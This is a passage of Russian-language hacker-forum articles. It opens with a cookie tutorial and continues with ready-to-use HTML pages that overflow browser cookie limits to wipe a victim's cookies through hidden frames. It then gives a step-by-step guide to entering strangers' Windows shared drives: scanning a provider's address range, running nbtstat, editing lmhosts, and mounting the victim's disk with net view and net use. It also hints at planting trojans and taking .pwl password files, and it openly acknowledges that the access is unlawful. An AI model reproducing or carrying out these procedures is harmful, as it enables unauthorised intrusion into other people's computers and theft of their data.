передаче Cookie используется HTTPS (HTTP с SSL - Secure Socket Level). Если secure не указан, Cookie передается HTTP. Если Cookie использует одинаковое значение NAME, domain и path - старое значение заменяется новым. Вставка Cookie в HTML. Вставить Cookie можно несколькими способами. Самые простой - это через META-тег. Альтернативным способом является Javascript и всевозможные другие технологии (CGI, PHP, SSI и т.д.). Рассматривать CGI, PHP, SSI и прочие мы не будем, т.к. это требует от вашего домена, где располагается страница, возможности использования этих технологий, что бывает не всегда. Использование Cookie через META-тег. Между тегов HEAD Cookie вписывается так: <META HTTP-EQUIV="Set-Cookie" CONTENT="NAME=VALUE; expires=DATE; domain=DOMAIN_NAME; path=PATH; secure"> Можно использовать несколь META-тегов с Cookie в одном документе. Пример: <META HTTP-EQUIV="Set-Cookie" CONTENT="Имя=Вася; expires=Fri, 14-Sep-2005 13:13:13 GMT; path=/; domain=provider.com; secure"> Использование Cookie через Javascript. Использование Cookie с помощью Javascript является самым популярным способом, т.к. это довольно просто для разработчика, не требует от сервера определенного программного обеспечения и может использовать динамичные данные, генерируемые внутренним Javasript-скриптом, либо вводимые пользователем. Вот примера скрипта Javascript, используещего Cookie. Скрипт не мой, но он точно описывает те возможности, о которых мы говорим. К сожалению, автора скрипта я не знаю поэтому указать не могу. <script language="JavaScript"> <!-- var username = GetCookie('username'); if (username == null) { username = prompt(' Пожалуйста, введите Ваше им\я\n (в противном случае нажмите cancel)',""); if (username == null) { alert('Ну хорошо, тогда я буду звать Вас ВебСёрфером'); username = 'ВебСёрфер'; } else { pathname = location.pathname; myDomain = pathname.substring(0,pathname.lastIndexOf('/')) +'/'; // Установка параметра expire на год вперед. var largeExpDate = new Date (); largeExpDate.setTime(largeExpDate.getTime() + (365 * 24 * 3600 * 1000)); SetCookie('username',username,largeExpDate,myDomain); } } function getCookieVal (offset) { var endstr = document.cookie.indexOf (";", offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie (name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return getCookieVal (j); i = document.cookie.indexOf(" ", i) + 1; if (i == 0) break; } return null; } function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + "=" + escape (value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure"; : ""); } document.write('<p align=center>Здравствуйте, ' + username + '</p>'); // --></SCRIPT> Останавливаться на данном скрипте смысла нет, статья о Cookie, а не о Javascript. Как видите, технология Cookie предоставляет огромные возможности для разработчиков сайтов. Cookie поддерживается всеми более или менее известными броузерами, такими как Netscape Navigator, Microsoft Internet Explorer, Mosaic, Opera и другими, начиная с самых первых версий. Взлом через Cookie А зачем мне все это надо? Технология cookie используется при заполнении полей, хранения информации, для виртуальных корзин в Интернет-магазинах, в баннерных сетях и много чего еще. Но также эта технология используется взломщиками для достижения своих целей. 1. Радость от гадости. Первый пример основан на том, что по спецификациям, броузер может хранить не больше 20 записей от одного домена. При переполнении данного лимита, старые записи затираются новыми. Использование: Закачать HTML-файл на тот сервер, откуда пришли cookie. Можно послать по E-mail, если жертва читает почту через Web, все cookie от его почтового сервера сотрутся. Если нужно удалить все cookies с *.домен.com, заменять строчки примера на <META HTTP-EQUIV="Set-Cookie" CONTENT="You_are1=cacked1; EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT; path=/; domain=домен.com;"> Работает только с доменами COM, EDU, NET, ORG, GOV, MIL, INT. Сам пример файла: <html><head> <META HTTP-EQUIV="Set-Cookie" CONTENT="You_are1=cacked1; EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT;"> <META HTTP-EQUIV="Set-Cookie" CONTENT="You_are2=cacked2; EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT;"> ... <META HTTP-EQUIV="Set-Cookie" CONTENT="You_are20=cacked20; EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT;"> </head></html> Сохраняй этот файл как cook.htm, он нам еще пригодится. 2. Полная гадость. Вторая гадость основана на том, что общее количество cookies может быть не больше 300. При переполнении лимита, старые записи также затираются новыми. Уловил мысль? Затираем все cookies жертвы. Сначала тебе придется завести 15 аккаунтов для страничек на разных серверах. Заходим на всякие narod.ru, заводим аккаунты cook.site1.ru, cook.site2.ru и т.д. до cook.site15.ru. Затем заливаем на каждую страничку файл cook.htm, который мы использовали в прошлой гадости. На все это у тебя должно уйти не больше часа при нормальной раскладке пальцев \m/. Создаем файлик index.html и вписываем туда следующее: <html><head></head> <frameset rows="0,0,0,0,0,0,0,0,0,0,0,0,0,0,*"> <frame scrolling="no" noresize target="cook.site1.ru/cook.htm"> <frame scrolling="no" noresize target="cook.site2.ru/cook.htm"> ... <frame scrolling="no" noresize target="cook.site15.ru/cook.htm"> </frameset></html> Заливаем созданный файл в любое место, например на cook.narod.ru. Зайдя на этот сайт, у пользователя будет вычищаться весь cookies, накопленный годами, за пару секунд. 3. Почему нельзя забить дисковое пространство или сделать buffer overflow? Дело в том, что каждый cookie не может быть больше 4kb. Если лимит превышен, начало cookie удаляется. Максимум, что можно сделать - забить жертве 1,2mb дискового пространства при хорошем качестве связи у жертвы, либо disconnect'ить жертву при плохой связи. Для этого меняй строчки в cook.htm на следующее: <META HTTP-EQUIV="Set-Cookie" CONTENT="XAKEP1=Здесь вписывай 4kb (с вычитом 6 байт на имя XAKEP1); EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT;"> Защита. Способов защиты несколько и каждый способ довольно неудобен. 1. Отменить использование cookie в броузере. Недостаток в том, что пользователь фактически отказывается ходить на огромное количество сайтов. 2. Завести программу из класса Cookie Manager. Недостаток в том, что надо постоянно держать лишнюю программу. А это для интернетчика с включенным Firewall'ом, антивирусным монитором, ICQ, Dialer'ом и т.д. довольно большое неудобство. 3. Не вступать в случайные связи. Недостаток в том, что твои "проверенные" друзья тоже могут над тобой подшутить, да и не вступать в случайные связи - значит сидеть дома и наслаждаться сайтами по адресу 127.0.0.1.
  23. Расшаренные диски или как получить доступ к удаленному компу. Данная статья описывает получение доступ к удаленному компьютеру. Многим известна фраза - "расшаренные диски". Но что это такое, зачем это нужно и как этим пользоваться, многие не знают. Я Вам вот что скажу: это понятие дает нам очень многое, а именно доступ к удаленному компьютеру, а соответственно очень много хороших вещей, таких как халявный инет, доступ к почте, красивый номер аси и многое другое. Несмотря на это мы имеем одну очень не хорошую вещь - неправомерный доступ к компьютерной информации . Но это очень вряд-ли, потому как Вы прочитаете эту статью, Вы поймете что белые и пушистые ламеры сами открывают нам доступ к компьютерной информации, находящейся у них на компе... Что же такое расшаренные диски??? Это есть ни что иное как "Шары", а именно сервисы висящие на 137, 138 и 139 портах. Эти сервисы изначально были созданы для совместного доступа к файлам и принтерам, для удобства пользователей. Но умные хакеры пользуются этой услугой по своему усмотрению)). Что нужно установить, чтобы получить доступ к расшаренным дискам. Нужно очень немного, точнее ничего: то есть практически никого софта и уж тем более железа. Все оборудование присутствует у тебя на компе а проги - в твоей ОС (речь идет о платформах Win32). Теперь приступаем к установке: заходим в Пуск => Настройки => Панель Управления => Сеть. Видите такую картинку?: ну может почти такую...Разница между этой картинкой и картинкой на вашей машине только в количестве протокол. Вот теперь-то нам и придется их пополнить. Ждем Добавить => Клиент => Microsoft => Клиент для сетей Microsoft. Далее проделываем туже операцию: Добавить => Протокол => Microsoft => NetBEUI. Семейный вход в систему ставить не обязательно. Журнал "Хакер" зачем-то советует ставить еще и Службу доступа к файлам и принтерам. На самом деле непонятно зачем??? Все прекрасно работает и без нее, а если Вы ее ставите, то становитесь такой же мешенью...с расшаренными дисками. Поясню что означают поставленные протоколы. Протокол NetBEUI (NetBIOS Extended User Interface) как раз нам и нужен чтобы доставать вот эти самые расшаренные диски. А Клиент для сетей Microsoft нужен для сканера, который будет искать эти диски на других компах. Конечно, можно сделать это вручную, перебирая каждый IP, но это нудно и бестолково. Поэтому воспользуемся сканером X-sharez от всем изветной команды Xakep. Но об этом чуть попозже...мы еще не завершили все настройки. Теперь идем в Мой компьютер => Удаленное соединение...Выбираем соединение, через которое обычно подключаемся в нэт и щелкаем правой клавишей мыши, находим закладку тип сервера и наблюдаем такую картину: Поставьте галочки именно там где стоят на картинке. Ну вот и все...закончили. Приступаем к софту. Все что нам надо это сканер расшаренных ресурсовxSHaReZ. Самую новую версию Вы можете скачать на http://www.xakep.ru/articles/releases. Как и у многих сканеров, при запуске мы сразу увидим поля для диапазона Ip-адресов. Пощупайте для начала пользователей Вашего провайдера меняя только последние числа IP-адреса. Скажем с 62.131.234.1 по 62.131.234.255 и жмен "Скан". При просмотре раздела "Логи" если Вы обнаружите такую картину: IP адрес: 62.131.234.1 Имя компа: GOSHA Имя юзера за компом: IVANOV Рабочая группа: GOSHA то у Вас есть шанс. После этого заходим в Пуск => Выполнить и набираем nbtstat.exe -A ip.ad.re.ss IP именно тот который Вам выдал сканер. После чего, окно Сеанса MS-DOS выдаст Вам такую картинку: GOSHA <00> UNIQUE GOSHA <15> UNIQUE SERVER <00> GROUP SERVER <1C> GROUP SERVER <1E> GROUP GOSHA <05> UNIQUE MAC Adress = 00-00-00-00-00-00 Это должно получится на 100%, при условии если Вы все сделали правильно. После этого нам нужно только имя GOSHA - имя компьютера. Дальше жмем Пуск => Найти => Файлы и папки Ищем файл lmhosts он изначально пустой, вписываем туда строку ip.ad.re.ss GOSHA #pre сохраняем Опять жмем Выполнить и вводим следующую строку net view \\GOSHA после чего Вы при удаче Увидите следующее окно: Share name Type ---------------------------------------- MyDisk Disk Obshiye Disk Команда выполнена успешна Могу сказать что это окно не всегда появится в таком виде...Сначала может ничего не получаться, будут выскакивать ошибки - это означает что Вы не имеете права доступа к дискам. Но не отчаевайтесь...через несколько попыток у Вас все же получится. Если получилось. Смотрим, что делать дальше... жмем Выполнить... net use x: \\GOSHA\MyDisk Если видите надпись - Команда выполнена успешна - значит все получилось. Лезим в Мой компьютер и видим там еще один дополнительный Диск X Все...теперь этот диск у Вас на компе и можете делать с его содержимым все, что Вам угодно. Только не запускайте трояна типа BackDoor, потому что он пропишется у Вас, так как диск лежит у Вас на компе. Придется троя прописывать автозагрузку автоматически. Зато есть доступ к pwl и много еще к чему другому...успехов Вам.
×
×
  • Create New...